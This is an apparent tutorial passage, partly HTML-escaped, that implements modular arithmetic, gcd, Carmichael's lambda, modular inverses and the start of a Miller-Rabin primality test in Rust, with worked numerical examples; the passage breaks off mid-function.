&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;impl FieldPoint {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    pub fn new(num: u128, prime: u128) -&amp;gt; FieldPoint {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        if num &amp;gt;= prime {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            panic!(&amp;quot;Not a valid input for a field point, num should be nonnegative and less than prime, obtained {}&amp;quot;, num);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        } else {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            FieldPoint {num:num, prime:prime}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Methods are defined following the keyword &lt;code&gt;impl&lt;&#x2F;code&gt; and the name of the &lt;code&gt;struct&lt;&#x2F;code&gt;. We have a constructor for the &lt;code&gt;FieldPoint&lt;&#x2F;code&gt;, which takes two unsigned &lt;code&gt;u128&lt;&#x2F;code&gt; integers.&lt;&#x2F;p&gt;
&lt;p&gt;To define addition, we can implement the trait &lt;code&gt;Add&lt;&#x2F;code&gt; for &lt;code&gt;FieldPoint&lt;&#x2F;code&gt; in this way&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;impl Add for FieldPoint {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    type Output = Self;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    fn add(self, other: Self) -&amp;gt; Self {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        if self.prime == other.prime {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            FieldPoint {num: (self.num + other.num).rem_euclid(self.prime), prime: self.prime}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        } else {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            panic!(&amp;quot;Cannot add these field points, different prime values {},{}&amp;quot;,self.prime,other.prime);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;The addition is simply adding the &lt;code&gt;num&lt;&#x2F;code&gt; fields and if the result exceeds the modulus &lt;code&gt;prime&lt;&#x2F;code&gt;, we take the remainder of the Euclidean division between the sum and the modulus.&lt;&#x2F;p&gt;
&lt;p&gt;Multiplication works in a similar way&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;impl Mul for FieldPoint {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    type Output = Self;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    fn mul(self, other: Self) -&amp;gt; Self {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        if self.prime == other.prime {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            FieldPoint {num: (self.num*other.num).rem_euclid(self.prime), prime: self.prime}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        } else {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            panic!(&amp;quot;Cannot multiply these field points, different prime values, {},{}&amp;quot;,self.prime,other.prime);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;We also need to define powers of &lt;code&gt;FieldPoint&lt;&#x2F;code&gt;. We can do this in a rather efficient way by repeated squaring and taking remainders:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;pub fn power(&amp;amp;self,index: u128) -&amp;gt; Self {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        if index == 0 {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            FieldPoint {num: 1u128, prime: self.prime}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        } else {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            let mut aux=index.rem_euclid(self.prime-1u128);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            let mut acc: u128 = 1;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            let mut base: u128 =self.num;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            while aux &amp;gt;0{&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                if aux%2 == 0 {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                    base = (base*base).rem_euclid(self.prime);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                    aux=aux&#x2F;2u128;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                } else {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                    acc = (acc*base).rem_euclid(self.prime);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                    aux=aux-1u128; &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            FieldPoint {num: acc, prime: self.prime}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;The power function takes a &lt;code&gt;FieldPoint&lt;&#x2F;code&gt; and &lt;code&gt;index&lt;&#x2F;code&gt;, a &lt;code&gt;u128&lt;&#x2F;code&gt;. If the index is $0$, the result is trivial and we output a &lt;code&gt;FieldPoint&lt;&#x2F;code&gt; with &lt;code&gt;num&lt;&#x2F;code&gt; equal to $1$. In any other case, we first reduce &lt;code&gt;index&lt;&#x2F;code&gt;: if it exceeds &lt;code&gt;prime&lt;&#x2F;code&gt;, we can take the remainder of &lt;code&gt;index&lt;&#x2F;code&gt; by &lt;code&gt;prime-1&lt;&#x2F;code&gt; (this works when the modulus is prime, since Fermat’s little theorem says that $a^{p-1}\equiv 1 \pmod{p}$; for a composite modulus $n$, a better version would reduce &lt;code&gt;index&lt;&#x2F;code&gt; by $\phi(n)$) and store it in &lt;code&gt;aux&lt;&#x2F;code&gt;. We also define a variable &lt;code&gt;acc&lt;&#x2F;code&gt; to accumulate the result and &lt;code&gt;base&lt;&#x2F;code&gt;, which we will repeatedly square and reduce modulo &lt;code&gt;prime&lt;&#x2F;code&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;We now focus on the squaring and the updating of the result:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;while aux &amp;gt;0{&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    if aux%2 == 0 {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        base = (base*base).rem_euclid(self.prime);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        aux=aux&#x2F;2u128;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    } else {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        acc = (acc*base).rem_euclid(self.prime);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        aux=aux-1u128; &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;We keep decreasing the exponent stored in &lt;code&gt;aux&lt;&#x2F;code&gt;: if it is even (the first condition; this could be checked much faster by inspecting the last bit of &lt;code&gt;aux&lt;&#x2F;code&gt;), we divide &lt;code&gt;aux&lt;&#x2F;code&gt; by two and update &lt;code&gt;base&lt;&#x2F;code&gt; to the remainder of its square. If it is odd, we update the result in &lt;code&gt;acc&lt;&#x2F;code&gt; and decrease &lt;code&gt;aux&lt;&#x2F;code&gt; by one (which means that in the next step it will be even).&lt;&#x2F;p&gt;
&lt;p&gt;To convince ourselves, let’s work through a short numerical example, following the instructions above. Take &lt;code&gt;prime&lt;&#x2F;code&gt; as 11, &lt;code&gt;num&lt;&#x2F;code&gt; as 4, and &lt;code&gt;index&lt;&#x2F;code&gt; as 39.&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. We set `aux` equal to the remainder of 39 and 10 (which is also $\phi(11)$). We get `aux=9`.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. Since $9&amp;gt;0$, we go inside the while loop. $9$ is odd, so `acc=1*4=4` and `aux=8`.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    3. `aux` is even, so `base=4*4=16`; we have to reduce the number by taking the remainder by $11$, so `base=5` and `aux=4`.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    4. `aux` is even, so `base=5*5=25` and we get `base=3` and `aux=2`.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    5. `aux` is once again even, `base=9` and `aux=1`.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    6. `aux` is odd, we get `acc=4*9=36-&amp;gt;3` and `aux=0`.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    7. Since `aux=0`, we jump outside the while loop and the function returns the `FieldPoint` (`num`=3,`prime`=11).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Another function that we need is the greatest common divisor. A very simple form of the algorithm looks like this:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;pub fn gcd(a: u128,b: u128) -&amp;gt; u128 {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let mut r0: u128=b;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let mut r1: u128=a;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; No need to order a and b: if a&amp;lt;b, the first loop iteration swaps them.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let mut r2: u128 = 1;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    while r2 &amp;gt;0 {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        r2=r1.rem_euclid(r0);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        r1=r0;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        r0=r2;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    r1&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;We take two numbers $a$ and $b$ and output their greatest common divisor. We initialize the dividend $r_1$ as $a$ and the divisor $r_0$ as $b$; the order does not really matter, because if $a&amp;lt;b$ the first iteration simply swaps the two. At each step we take the remainder of $r_1$ divided by $r_0$ and then exchange the roles (since the remainder $r_2$ is smaller than $r_0$), chopping the larger number down by the smaller one until the remainder reaches zero. A numerical example helps illustrate the point:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. Take a=12, b=8 (we can immediately see that the right answer is 4, but this helps us see how the algorithm finds it).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. $r_0=8$, $r_1=12$, $r_2=1$ so we immediately enter the while loop.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    3. $r_2=4$ since the remainder of $12$ divided by $8$ is 4.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    4. $r_1=8$ and $r_0=4$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    5. Since $r_2$ is not zero, we stay inside the loop.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    6. $r_2=0$ (since $8$ is divisible by $4$), $r_1=4$ and $r_0=0$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    7. Now $r_2=0$ so we exit the loop and the function outputs $gcd=4$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
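The same algorithm can be tried as a standalone function. This sketch rearranges the loop slightly (testing the divisor instead of the remainder) so it also handles a zero input; that adjustment is our own, not part of the original code.

```rust
// Self-contained sketch of the iterative Euclidean algorithm traced above.
fn gcd(a: u128, b: u128) -> u128 {
    let mut r0 = b;
    let mut r1 = a;
    // Repeatedly replace the pair (r1, r0) by (r0, r1 mod r0) until the
    // divisor is zero; the last non-zero value is the gcd.
    while r0 > 0 {
        let r2 = r1 % r0;
        r1 = r0;
        r0 = r2;
    }
    r1
}

fn main() {
    assert_eq!(gcd(12, 8), 4); // the example from the text
    assert_eq!(gcd(8, 12), 4); // order does not matter
    assert_eq!(gcd(7, 5), 1);  // coprime inputs
}
```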
&lt;p&gt;Carmichael’s totient function can be easily calculated with help from the previous function:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;pub fn lambda(p: u128,q: u128) -&amp;gt; u128 {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let greatest_div: u128=gcd(p-1,q-1);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    (p-1)*(q-1)&#x2F;greatest_div&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
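As a quick sanity check, here is a self-contained sketch (with its own tiny recursive `gcd` so it compiles on its own) showing that $\lambda(n)$ can be much smaller than $\phi(n)$; the primes $11$ and $13$ are illustrative choices of ours.

```rust
// lambda(n) = lcm(p-1, q-1) = (p-1)*(q-1) / gcd(p-1, q-1) for n = p*q.
fn gcd(a: u128, b: u128) -> u128 {
    if b == 0 { a } else { gcd(b, a % b) }
}

fn lambda(p: u128, q: u128) -> u128 {
    (p - 1) * (q - 1) / gcd(p - 1, q - 1)
}

fn main() {
    // lcm(10, 12) = 60, versus phi(11 * 13) = 10 * 12 = 120.
    assert_eq!(lambda(11, 13), 60);
}
```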
&lt;p&gt;Inverses can be easily calculated with help from the extended Euclidean algorithm:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;pub fn inversion(a:i128,b:i128) -&amp;gt; i128 {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let mut t=0i128;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let mut r=b;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let mut t1=1i128;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let mut r1=a;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    while r1 != 0i128 {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        let q=r.div_euclid(r1);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        (t,t1)=(t1,t-q*t1);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        (r,r1)=(r1,r-q*r1);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    if r != 1i128 {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        return 0i128;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    if t&amp;lt;0{&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        t=t+b;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    t&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Let’s see how it works for a simple case: $a=3$, $b=5$; the inverse of $3$ (modulo 5) is $2$. The algorithm begins:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. $t=0$, $t_1=1$, $r=5$, $r_1=3$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. Since $r_1=3 \neq 0$ we loop: $q=1$, $t=1$, $t_1=0-1\times 1=-1$, $r=3$, $r_1=2$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    3. $r_1 \neq 0$, $q=1$, $t=-1$, $t_1=1-1\times (-1)=2$, $r=2$, $r_1=1$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    4. $r_1 \neq 0$, $q=2$, $t=2$, $t_1=-1-2\times 2=-5$, $r=1$ and $r_1=0$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    5. $r_1 = 0$, so the function outputs $t=2$, which is the correct answer.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
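The routine can also be exercised as a standalone sketch; the test values beyond the worked example ($17$ modulo $101$, and the non-invertible $4$ modulo $8$) are our own illustrative choices.

```rust
// Self-contained sketch of the modular-inverse routine above (extended
// Euclidean algorithm); returns 0 when a has no inverse modulo b.
fn inversion(a: i128, b: i128) -> i128 {
    let (mut t, mut t1) = (0i128, 1i128);
    let (mut r, mut r1) = (b, a);
    while r1 != 0 {
        let q = r.div_euclid(r1);
        (t, t1) = (t1, t - q * t1);
        (r, r1) = (r1, r - q * r1);
    }
    if r != 1 {
        return 0; // gcd(a, b) != 1, so no inverse exists
    }
    if t < 0 {
        t += b; // normalize into the range 0..b
    }
    t
}

fn main() {
    assert_eq!(inversion(3, 5), 2);   // the worked example: 3 * 2 ≡ 1 (mod 5)
    assert_eq!(inversion(17, 101), 6); // 17 * 6 = 102 ≡ 1 (mod 101)
    assert_eq!(inversion(4, 8), 0);   // gcd(4, 8) = 4, so no inverse
}
```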
&lt;p&gt;We can test primality using the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;en.wikipedia.org&#x2F;wiki&#x2F;Miller%E2%80%93Rabin_primality_test&quot;&gt;Miller-Rabin test&lt;&#x2F;a&gt;. Given an odd number $n$, we can write it as $n=2^r\times d +1$, for some $r&amp;gt; 0$ and $d$ an odd number. If $n$ is prime, then for any $a$ coprime to $n$, either:&lt;br &#x2F;&gt;
$a^d \equiv 1 \pmod{n}$&lt;br &#x2F;&gt;
or $a^{2^s \times d}\equiv -1 \pmod{n}$ for some $0\leq s &amp;lt; r$.&lt;br &#x2F;&gt;
This is because if $n$ is prime, it satisfies Fermat’s little theorem and the only square roots of $1$ are $-1$ and $1$. If neither condition is fulfilled, $n$ is definitely not prime; if the test passes, $n$ could still be composite, depending on the choice of $a$ (known as the witness). Checking several values of $a$ makes it very unlikely that a composite number passes every round. The decomposition is easy to do:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;pub fn decompose(n: u128) -&amp;gt; (u128,u128) {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        let mut d: u128=n-1;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        let mut r: u128=0;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        while d%2 == 0 {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            d &#x2F;= 2;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            r += 1;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        (d,r)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Since $n-1$ is even, we can take factors of $2$ repeatedly, until $d$ is no longer divisible by $2$. The condition can be checked faster by looking at the last bit of $n-1$.&lt;&#x2F;p&gt;
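A self-contained version of the decomposition, with a couple of checks whose specific inputs are our own illustrations:

```rust
// Sketch of the decomposition n - 1 = 2^r * d with d odd, as described above.
fn decompose(n: u128) -> (u128, u128) {
    let mut d = n - 1;
    let mut r = 0u128;
    // Strip factors of 2 until d is odd; d % 2 == 0 is the same as checking
    // that the last bit of d is zero.
    while d % 2 == 0 {
        d /= 2;
        r += 1;
    }
    (d, r)
}

fn main() {
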